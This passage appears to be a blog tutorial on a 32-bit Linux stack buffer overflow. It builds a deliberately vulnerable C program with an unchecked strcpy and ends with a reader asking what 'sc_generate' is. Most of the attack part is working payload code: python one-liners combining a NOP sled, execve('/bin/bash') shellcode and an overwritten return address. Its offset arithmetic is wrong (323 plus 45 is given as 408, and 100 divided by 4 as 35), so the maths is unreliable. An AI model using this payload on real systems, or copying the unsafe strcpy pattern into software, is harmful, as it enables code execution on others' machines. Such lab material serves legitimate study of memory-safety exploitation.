2.making vulnerable application
//i am vulner thing
#include <stdio.h>
#include <string.h>
int main(int argc, char** argv)
{
char buffer[500];
strcpy(buffer, argv[1]);
return 0;
}
3. compile vulnerable application
4. now we can find offset needed to trigger and overwrite
5. check if the buffer already overwrite EIP and ESP information
6. find address EIP
so we get EIP address 0xbffff12c but this is not the real esp address, we need to decrease 200 bytes so my EIP address is 0xbfffef2c (using KCalc)
then we now if we need 508bytes from this formula :
323 bytes of junk + a shellcode which is 45 bytes = 408 bytes.
508 bytes - 408 bytes = 100 bytes.
So after the shellcode we still have 100 bytes, we divide 100 with 4 (to fit an entire memory address:
\x41\x41\x41\x41 for example.) and get 35
7. generate shellcode from sc_generate with lenght 45 bytes
$(python -c 'print "\x90"*323 + "\x31\xc0\x83\xec\x01\x88\x04\x24\x68\x62\x61\x73\x68\x68\x62\x69\x6e\x2f\x83\xec\x01\xc6\x04\x24\x2f\x89\xe6\x50\x56\xb0\x0b\x89\xf3\x89\xe1\x31\xd2\xcd\x80\xb0\x01\x31\xdb\xcd\x80" + "\x2c\xfe\xff\xbf"*35')
modification exploit
$(python -c 'print "\x90"*370 + "\x31\xc0\x83\xec\x01\x88\x04\x24\x68\x62\x61\x73\x68\x68\x62\x69\x6e\x2f\x83\xec\x01\xc6\x04\x24\x2f\x89\xe6\x50\x56\xb0\x0b\x89\xf3\x89\xe1\x31\xd2\xcd\x80\xb0\x01\x31\xdb\xcd\x80" + "\x2c\xfe\xff\xbf"*35')
What is sc_generate? Can't really find it on google, and doesn't seem to exist on my backtrack.
BalasHapus